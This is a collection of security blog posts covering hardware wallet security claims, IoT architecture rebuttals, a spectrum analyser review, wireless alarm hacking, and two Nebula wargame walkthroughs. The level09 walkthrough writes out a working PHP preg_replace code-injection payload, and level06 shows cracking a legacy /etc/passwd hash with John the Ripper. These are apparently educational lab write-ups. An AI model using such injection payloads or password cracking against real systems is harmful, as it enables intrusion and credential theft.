BC Vault – is their security model better?

Yesterday, on the back and forth about BC Vault, their CTO, Alen Salamun, kept on saying their wallet was more secure, based on their product needing 5 items to be breached, and other wallets just 1.

To access the funds on BC Vault, you need:

  1. Global password
  2. Global PIN
  3. Wallet password
  4. Wallet PIN
  5. Device or backup file

To access the funds on other wallets, you need:

  1. The BIP39 words

I don’t see how you can possibly claim that BC Vault is more secure based on this comparison. All you can say is that it is different. It certainly is not “simple math”.

My BIP39 words are stored on a piece of paper around 200 miles from here, in a safe. I was told I would only have to enter them should my hardware wallet lose the key material. I do not need access to them, and probably never will. I do not need these words to spend funds. These words have never been entered into a computer.

Each time I want to use a BC Vault, I need to enter the passwords (which are entered into a computer) and a PIN (entered into the device). Entering data into a computer puts you at risk of phishing. Entering the PIN puts you at risk of shoulder surfing, among other attacks. A user will need to keep this information at hand to use the wallet, unlike BIP39 words.

In fact, I didn’t keep the BIP39 words on my Trezor, and hence it is impossible to access the funds without the device. This clearly demonstrates that you do not need the words to use the wallet.

This “simple math” is comparing apples and oranges, and is exactly the same path Bitfi went down. Bitfi claimed that their model of entering everything each time you used it was clearly better than storing keys in a secure box.

All we can say is that these are different security models.

It was inferred that I said this was worse or the same. It’s interesting how many vendors go down this route – when people compare their system to others, they automatically assume you said it was worse.

My issue isn’t that they are different. It’s the claim that it is clearly better. Prove that 5 regularly used items are more secure than 1 infrequently used.

It’s not as simple as 5 > 1.

Hilarious still from CSL Dualcom’s NOC video

CSL Dualcom make their Network Operations Centre widely known.

When they posted a video, I thought I’d check them for sensitive information disclosure, like actual customer ICCIDs and chip numbers.

However, what I found was far funnier. On one of their own promotional videos, they show a close up of an member of staff using some kind of operations/support portal, but they are also logged into Hotmail.


To the left, the partially obscured tab says “o Be Loved?” – a dating site maybe?

Don’t let your staff use personal web email in your Network Operations Centre. This is idiocy.

Why you shouldn’t listen to Pat Burns on LinkedIn

An article entitled “Why The Internet of Things and the Cloud Should Break Up” showed up on Reddit and Twitter earlier this week. It sounded promising – I’m a proponent of decoupling IoT systems so that they don’t rely on the cloud, even if they still use the cloud most of the time. What I was greeted with was a terrible opinion piece, full of misinformation.

I don’t know where to start, it’s so bad.

A FitBit wristband connects via Bluetooth with your smartphone but sends your activity data to a FitBit cloud app. Does your personal health data really need to sit in the cloud or can you extract sufficient value from it by simply keeping the data stored locally on your smartphone?

This isn’t the IoT. That’s a Bluetooth device connecting to a phone. He seems to be one of these people who will call anything connected and not a full blown machine “IoT”.

For most of the IT industry — let’s just get this on the table — the cloud today is the hammer and there’s almost nothing that isn’t a nail. And the cloud is an easy place to build an IoT application and operates without the messy hassles of embedded software, endpoint security, FCC regulations, or fertility risks, to name a few.

Firstly, using the cloud generally means adding functionality to endpoints. Take a standard IP camera, accepting connections on port 80, using port-forwarding for remote access. Add cloud functionality to allow remote streaming and the system takes more time to develop. It is not a freebie.

Secondly, using the cloud normally makes endpoint security much less of an issue. Traditional architectures, such as port-forwarding to devices, or customers running their own infrastructure, involve inbound connections to your network and endpoints. Many cloud connected devices have absolutely no ports open at all – SmartThings v2 hub for example. Because of this, endpoint security becomes a lot less difficult.

Thirdly, regardless of your architecture, if you want to use wireless connectivity, you need to deal with RF. I don’t see how the cloud avoids this.

It’s cheap and everywhere. Like beer in your dorm, the cloud today is so popular and so well-capitalized that infecting the IoT was only a matter of when, not if. Spin-offs like cloud analytics or cloud perimeter security (no laughing!) are simply too affordable and too visible to pass up. Traditional enterprise IoT pilots that used to cost $250,000 in enterprise software and systems integration services can be executed at a fraction of this price now due to the cloud.

Developing cloud systems and operating robust, secure cloud systems is a cost and complexity. People are not doing it to avoid cost.

Tools. Compared to older desktop-based tools, cloud-based environments and API’s are vastly simpler to use and integrate while offering robust functionality.

He seems to be conflating using a cloud-based development environment with operating in the cloud. Nearly all cloud based solutions need significant development in traditional languages, on a desktop. It’s not point and click.

Weak endpoints and edges. Endpoints that don’t do analytics, support real-time queries, or even support full two-way messaging tend to spew data remorselessly to an edge router and/or the cloud. Bluetooth, ZigBee, 6lowPAN, and others are all guilty as charged and as a result, they end up driving their users to the cloud.

He seems to have a bee in his bonnet about how “stealthy” wireless protocols are. There really is no link between the wireless protocol used and how much data ends up getting sent to the cloud. They are different layers – one a transport protocol, the other application. Zigbee does send a fair amount of beacon traffic, but none of this ends up outside the PAN. If your app sends a lot of traffic over Zigbee and then your gateway sends it to the cloud, that is not the fault of Zigbee.

It’s not secure. This one is hard to overstate as crummy IoT security is the sordid “yeah, but” in so many discussions about the IoT. IDC predictsthat nearly every IT network will have an IoT security breach by the end of 2016 and IT departments are in full freakout mode now. Endpoint security is comically bad and compounded with a hacker-friendly cloud, what could go wrong?

There is absolutely nothing inherent in the cloud architecture that makes it insecure. In fact, there can be a lot of advantages:

  • Endpoints no longer need to accept any incoming connections
  • Endpoints and gateways accept no user-input, massively simplifying design of secure interfaces
  • Connecting to a central point facilitates use of IDS, a skilled operations team, and regular centralised updates

Equally, there is nothing inherent in a cloud architecture that means the endpoints are insecure. An insecure endpoint will be insecure regardless of the architecture.

It’s not real-time. IoT apps that require real-time responses can’t tolerate the extra seconds or minutes required for a cloud lookup.

and later:

Waiting 2–3minutes for a cloud app to make time for you is a non-starter.

This is just pure misinformation. Going over the Internet adds latency. It doesn’t add “2-3 minutes”, it adds milliseconds typically. 2-3 minutes means the system has been designed badly, and this would be an issue regardless of where it operates.

It may not be faithful. The integrity of your data in the cloud is only as good as the people and systems hosting it. Sensors in your manufacturing facility in Taipei showing you running at 50% below your normal run rate or showing a supply chain hiccup? Hedge funds and competitors enjoy learning about this kind thing!

The integrity of your data on your self-hosted platform is only as good as the people and systems hosting it. Again, nothing inherent about cloud. I would rather have a skilled operations team managing intrusion detection, performance monitoring and disaster recovery than burden a sysadmin with yet another system in-house.

Getting out may be easier than getting in. Once you’ve married a cloud service, how easy will it be to disengage/migrate to another solution at some future date? Is standardization and interoperability in a state that will increase the risk of vendor lock-in? What if the cloud vendor is bought by your competitor and changes policies?

Which is equally true of any bought-in platform. Just remove the word “cloud” from the above paragraph. Vendor lock-in is real however.

A new golden rule of IoT network design is to store sensor data as close as possible to its point of origin and limit its sharing across the network unless absolutely necessary.

You can’t just invent golden rules. Many people want low-cost, low-power endpoints with no storage and no persistence, pushing everything to more powerful gateways or servers. The AWS and Azure IoT platforms both accommodate for this. This is Pat Burn’s golden rule, to sell his product.

The endpoint is key to the golden rule. Better processors, cheaper memory, and better networking stacks from companies like Haystack are evolving endpoints from dumb terminals to independent, distributed computing devices with real-time query (think Google for the IoT) and NoSQL-like filesystem support. Endpoint-centric designs also have the bonus of being more stealthy and secure, faster, cheaper, and better stewards of battery life and wireless bandwidth. In short, good IoT network design should begin with the endpoint in mind and “dumb” endpoint technologies that beacon or create unnecessary security risks should be phased out

I just don’t know where to begin on this.

The enemy of security is complexity. Are you actually trying to argue that having hundreds of endpoints in a distributed network, able to store data and be queried, are going to be more secure than, say, a memory-based RFID tag? Or a transmit-only 8-bit PIC based humidity sensor?

How are these endpoints cheaper?

What is his issue with beacons and stealth? Well – it’s lucky there is another article – “A Simple Proposal To Improve Security for the Internet of Things” to help us demolish yet another series of misconceptions and misinformation.

Almost every IoT security breach in recent news can be traced to the poor architecture of the wireless protocol used by the device.

No, no they can’t.

Firstly, that is very, very specific. “Poor architecture of the wireless protocol”. Not “Weak implementation of the wireless protocol” or “devices using wireless protocols”.

Secondly, neither of the links provided are breaches. A breach is the result of a system being exploited. One is information leakage, the other is a report of a vulnerability.

Thirdly, the Jeep hack was nothing to do with the wireless protocol. Jeeps could be using wired Ethernet and the same issues would have been present.

Fourthly, nearly every IoT breach in recent news has been carried out over the Internet. Not local attacks to the wireless protocol. There is a lot of research into wireless security, and there are a lot of noise at conferences, but the bulk of issues occur over the Internet remotely. Hackers are not sat outside homes and business cracking your Zigbee or wireless burglar alarm.

Avoiding or minimizing the chances of unauthorized discovery is not technically difficult. But today’s IoT technologies like Bluetooth, 6lowpan, Sigfox, LoRaWAN, and others make unauthorized discovery very easy and it creates the worst kind of angst in IT departments.

Most of the protocols make discovery easy because it is intentional. They layer security with discoverability, enabling systems which people can actually use and are actually deployed (unlike Dash7).

The link doesn’t support that unauthorised discovery is causing angst in IT departments. He seems to often do this – provide a link which is vaguely related but doesn’t support the argument. It would be fair to say “IoT is causing angst in IT departments”.

Most wireless IoT technologies were originally conceived as ways to stream large files (Bluetooth, WiFi) while some were designed to be “lighter” versions of WiFi (e.g., ZigBee). Today they are being re-positioned as “IoT” technologies and security, to put it nicely, is an afterthought. Oh yes — some have tried to “layer on” security and may profess to support encryption

Layering encryption onto a transport protocol is completely valid. It’s widely acknowledge that ZigBee, Z-Wave and WiFi, if implemented correctly, are secure from the risk profile that is involved. Skilled hackers are not sat outside your house, waiting for you to pair you Hue bulbs to the hub and grab the keys. It is not happening. Even if they did, all they can do is turn your lights on and off.

I have no idea why they “profess” to support encryption. They all offer encryption. WPA2 is actually a very secure protocol.

hacks for all of these technologies are quite public yet fundamentally traceable to one original sin:

these wireless IoT technologies don’t know how to keep quiet.

What? What hacks of wireless protocols can be traced to not keeping quiet?

More recently, drones are being used to hunt for ZigBee-based endpoints, giving bad actors an easy way to discover, map, and hack ZigBee endpoints:

No, drones are being used to map Zigbee broadcast traffic. This is not enabling anyone to hack Zigbee anymore than putting your house number on the door of your house enables someone to pick your locks.

this type of hack provides all sorts of information about each endpoint, including manufacturer ID.

This is not a hack.

This need to be “discoverable” — and this is not limited to ZigBee, Bluetooth or WiFi but to most wireless IoT technologies — requires a near-constant advertising of a device’s presence, leading to any number of “disaster scenarios” that others have extensively written about.

The link, again, doesn’t support that a wireless protocol being discoverable will lead to any disaster scenario. Just pile the links on and hope no one checks.

There is no technical reason that the Internet of Things cannot embrace silence, or stealth as I prefer to call it, as a first principle of endpoint security. Stealth is not a silver bullet for IoT security (there is no silver bullet) and stealth alone won’t protect a network from intrusions, but dollar-for-dollar, stealth is the simplest, cheapest, and most effective form of IoT security protection available.

There is, quite literally, nothing to support this position.

A endpoint, receiving and sending plaintext, unauthenticated commands and data, will not see a noticeable improvement in security. Passive monitoring of the channel will still leak data, and active tampering will cause havoc. The stealth must be broken for the device to send, and this can be seen.

An endpoint, receiving and sending encrypted, authenticated commands and data, will not see a noticeable improvement in security. The data is still encrypted. Unauthenticated commands won’t be carried out.

This is just garbage.

Dollar for dollar, it might be worth making your nodes quieter, but not at the cost of switching from a widely adopted, widely inspected wireless standard to Dash7.

He tries to explain why:

Cloaking. It is harder to discover, hack, spoof, and/or “stalk” an endpoint if a hacker cannot locate the endpoint.

Endpoints need to send. Being stealthy can reduce the traffic but there will still be traffic. Stealth is only a weak layer of security through obscurity.

Googling the IoT. Stealth enables real-time queries of endpoints, a la Google search that non-stealthy endpoints can’t support. Stealth also enables fast queries (<2 seconds) in environments with thousands of endpoints, in turn enabling big data analytics at the true edge of the network.

This has absolutely nothing to do with how stealthy communications are from the node. If you enable your node to be queried, it can be queried. In fact, querying and accessing data from the edge of a network almost negates attempts at being stealthy as you will see an increase in complex and important traffic of the wireless network.

Minimize interference. Less data being transmitted minimizes the opportunities for interference and failed message transmissions. Contrast this with the tragedy of the commons at 2.45 GHz, where WiFi, ZigBee, microwave ovens, and other countless other technologies engage in wireless gladiatorial combat and cause too many customers to return their IoT gadgets because they “don’t work”.

Again, this has very little to do with stealth. 434MHz – that Dash7 uses – has as many issues with contention as 2.4Ghz. In the UK, there are many more poor quality, untested, non-standards compliant transmitters in the 434MHz band than there are on 2.4Ghz.

Access control. Stealthy endpoints make it easier to control access to the endpoint by limiting who can query the endpoint.

Again, absolutely no link between stealth and access control. If you limit access to something, you limit access to it.

Storage. Less data being transmitted reduces storage costs. Storage vendors, on the other hand, love the non-stealthy IoT status quo.

Again, what? If your endpoint decides to ditch data, then your cloud can also decide to ditch data. This has nothing to do with stealth of the wireless protocol – it’s about volume of data at the application layer.

At this point, I’m bored of this. These articles are utter crap.




Nebula exploit exercises walkthrough – level09

There’s a C setuid wrapper for some vulnerable PHP code…

", $contents);

	return $contents;

$output = markup($argv[1], $argv[2]);

print $output;


I’m no PHP expert – this one took me a long time. There are two functions that look dubious there – file_get_contents and preg_replace. Let’s see what it is meant to do.

It looks like it reads the file provided as the first argument ($filename) and does nothing with a second argument ($use_me). The file read in is expected to be in the format:

[email dobby@trashbat.co.ck]

and it returns a string like so:

level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me
dobby AT trashbat dot co dot ck>

You can use the command to get an arbitrary file that flag09 is permissioned for:

level09@nebula:/home/flag09$ ./flag09 /home/flag09/flag09.php use_me

But we need to execute something, not read something.

Look closely at one of the preg_replace lines:

$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);

This looks like, for the 2nd matching term, run the spam function on it. The second term is substituted inside the spam() function, then executed. Maybe we can inject a command here.

I've recently done a couple of XSS tutorials/games, which have given me a fair bit of practice at command injection (in Javascript, though), and felt I was getting quite natural and good at it. However, this PHP one ended up being just a big case of trial and error.

I started trying to execute phpinfo() - it nearly always works and doesn't need any parameters passing to it.

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email phpinfo()]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me

Right - this just echos the command.

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email $phpinfo()]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me
PHP Notice:  Undefined variable: phpinfo in /home/flag09/flag09.php(15) : regexp code on line 1

Ok - it's now treating phpinfo as a variable, but that variable isn't defined.

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email ${phpinfo()}]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me
PHP Parse error:  syntax error, unexpected '(' in /home/flag09/flag09.php(15) : regexp code on line 1
PHP Fatal error:  preg_replace(): Failed evaluating code: 
spam("${phpinfo()}") in /home/flag09/flag09.php on line 15

Now we have passed an expression with invalid syntax...

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email {${phpinfo()}}]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me
PHP Version => 5.3.6-13ubuntu3.2

System => Linux nebula 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686

Yes! Ok - so this strange notation with curly braces works. I'm not quite sure why it needs to be like this, but now I have it, I can find examples of people using it.

Now we need to run getflag. PHP has system to do system calls.

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email {${system("getflag"()}}]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt use_me
PHP Parse error:  syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting T_STRING in /home/flag09/flag09.php(15) : regexp code on line 1
PHP Fatal error:  preg_replace(): Failed evaluating code: 
spam("{${system(\"getflag\"()}}") in /home/flag09/flag09.php on line 15

Hmm. It is escaping the inverted commas so it doesn't work. In fact, it seems to escape anything helpful

Coming back to one of the examples above - we managed to get it to treat phpinfo as a variable. What happens if we try to use the unused parameter, use_me?

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email $use_me]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt second_parameter

Right - so we can use that to pass in a string. Let's combine the two.

level09@nebula:/home/flag09$ cat /tmp/input.txt 
[email {${system($use_me)}}]
level09@nebula:/home/flag09$ ./flag09 /tmp/input.txt getflag
You have successfully executed getflag on a target account
PHP Notice:  Undefined variable: You have successfully executed getflag on a target account in /home/flag09/flag09.php(15) : regexp code on line 1

Excellent! I got there in the end. It felt a little painful. If the second parameter hadon't been called use_me, and this wasn't an exploit wargame, I would have given up. Not happy with this level.

Nebula exploit exercises walkthrough – level06

The flag06 account credentials came from a legacy unix system.

Most Linux systems use a shadow password file. The normal /etc/passwd file is visible in the open (it is used to map userid -> name etc.), but it has no password hashs. These are stored in /etc/shadow, which is permissioned such that unprivileged users can’t see the hashes.

So, let’s take a look at /etc/passwd:

level06@nebula:~$ cat /etc/passwd | grep flag06
level06@nebula:~$ cat /etc/passwd | grep level06

Compare level06 (a normal account) to flag06 (legacy). ueqwOCnSGdsuM is the hash of their password.

It’s been a long time since I have done this, but the go-to password cracker was always John the Ripper, and it still appears to be that way.

This is available as a package in Ubuntu, so it could be installed with sudo apt-get install john. I don’t know the sudo password, so I can’t install this in the Nebula VM without using the admin account they give you. It’s perfectly possible to install it on your local machine, copy the passwd file across, and crack it there though.

andrew@Andrews-MacBook-Pro:~/nebula$ john passwd
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello            (flag06)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 75300  trying: 123456 - marley
Use the "--show" option to display all of the cracked passwords reliably

I ran it on my Mac and it got the password very quickly – it’s just hello. Login and run getflag.


I haven’t managed to find an online password cracker that deals with this type of password hash, which is surprising. It is quite old-school though.

First look at the TI MSP-SA430-SUB1GHZ spectrum analyser

TI are running a “Back to school” promotion, and as part for this they are selling a simple sub-1GHz spectrum analyser for $25 (with free shipping to the UK).

It uses a CC430 chip, which is an MSP430 microcontroller plus an RF front-end. Seems like a deal, and could be used for something like RFCat.

It turned up in a couple of days, marked as a “Sample” so no duty or VAT to pay.

It’s in a nice plastic case, which I immediately ripped off.

Construction is good quality – the SMA connector is bolted on, big ground planes.


It connects to a PC using USB, with cable supplied. There is also a SMA antenna provided:

Unit out of case

You can download the spectrum analyser software from the TI site, although it does come with a CD as well. This is our baby monitor transmitting white noise:

Spectrum analyser

I’ve only had a quick play about with it… it works, sort of. It’s buggy though and certainly not as good as the software that comes with the RF Explorer.

Key points:

  • Covers 300-348MHz, 389-464MHz and 779-928MHz – quite gappy but covers ISM.
  • Relatively quick to update on the screen.
  • Can configure frequency, span, RBW and FSW. Minimum span is 0.2MHz, minimum RBW is 58kHz, minimum FSW is 1kHz. It seems that a lot of values here cause no display – span of 0.5MHz stops the display working.
  • Does realtime, max, average display.
  • Numeric entry validation is really irritating – it limits you whilst entering the value rather than after.
  • A lot of the UI doesn’t seem to like Windows 8 with scaling set to <>100%.
  • Crashes relatively frequently.
  • Mentions firmware and calibration data in the app, so it might be relatively well calibrated.
  • Source code for the app is available.

I’d be annoyed if I spent $250, but it’s great for £25. There is a lack of documentation on the hardware – there are a lot of passives between the SMA and CC430. It would be nice if this could be used for transmit as well as receive but I expect the passives will get in the way.

Bumbling burglars

Today, my wireless alarm hacking posts ended up on Hackaday, and I received this comment:

Your average suburban burglar is gonna be way to dumb to figure this stuff out. And if you’ve got millions of dollars worth of art or whatever that might attract a higher class of crook, you’re not gonna scrimp on security eh?

I’ve had more than a few people reply with the same sentiment over the last few months, so I thought I’d reply here rather than in a comment.

Burglars are too dumb

The burglar doesn’t need to be clever. He just needs to buy a device from someone who is clever and immoral. It’s possible to use a CC1110 RF SoC to jam, disarm, and otherwise disable many of these alarms. It wouldn’t need any skill to operate and it wouldn’t cost much.

Burglars won’t bother

This was exactly what people said about keyless ignition and entry on cars. That quickly changed once exploits were available.

Anyone with sense would have a better alarm system

They might have an alarm system that looks better on paper. But they have absolutely no way of actually knowing if the alarm has any exploitable vulnerabilities or not. There is no requirement for alarms to be independently tested. I can confidently say that much more expensive alarms are no better than the Friedland alarm detailed in my posts.

As an aside from this – the higher grade alarms are really only there to satisfy insurance requirements. As long as it the system meets the requirements of the insurers, it shouldn’t matter if there are any vulnerabilities. Unless, of course, it looks like the alarm wasn’t set in the first place…


This doesn’t mean that burglars are exploiting vulnerabilities in wireless alarms. It does mean two things:

  • Consumers don’t have the means to tell if an alarm system is secure or not, due to poor standards and lack of third party testing.
  • Alarm and signalling manufacturers are happy to sell insecure equipment because of this.

Reverse engineering a wireless burglar alarm – summary

What a mess!

I started (but didn’t really finish…) a series of posts reverse engineering several parts of a Friedland wireless burglar alarm. I will come back to finish it off, but in order, here are the posts:

If anyone wants any further details about technologies used in alarm systems (though not this one), I have another series of posts: